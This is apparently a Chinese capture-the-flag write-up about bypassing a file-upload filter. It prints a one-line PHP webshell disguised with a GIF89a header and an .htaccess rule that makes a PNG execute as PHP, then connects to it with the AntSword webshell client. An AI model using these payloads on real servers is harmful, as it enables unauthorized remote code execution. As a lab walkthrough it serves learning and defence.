直接上传一个php试试
后缀名不能有ph,那就bp抓包改一下试试,
似乎是判断Content-Type,改一下试试
还是说太露骨,改成其他类型试试
他说还是php的标志,php的标志明显的有文件头,但是我加了GIF819a,所以肯定不是,那就是?,<>,;,以及php,那就试一试没有<?的一句话,
不带<?的一句话:GIF89a<script language="php">eval($_POST[sb])</script> 
成功了,但是不能利用,想到用.htaccess来搞
<FilesMatch "0.png">
SetHandler application/x-httpd-php
</FilesMatch>
上传改类型为image/jpeg
这题就是要多试,根据他的提示来判断有什么过滤,最关键的是他只是不允许ph后缀的,而不是搞什么白名单,导致可以上传.htaccess,来利用。还有蚁剑连接的时候,要upload/faf906c9883ffd8c8b200548643ca8ca/0.png这个,这个才是网站的保存上传文件的目录。
扫一扫
995
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
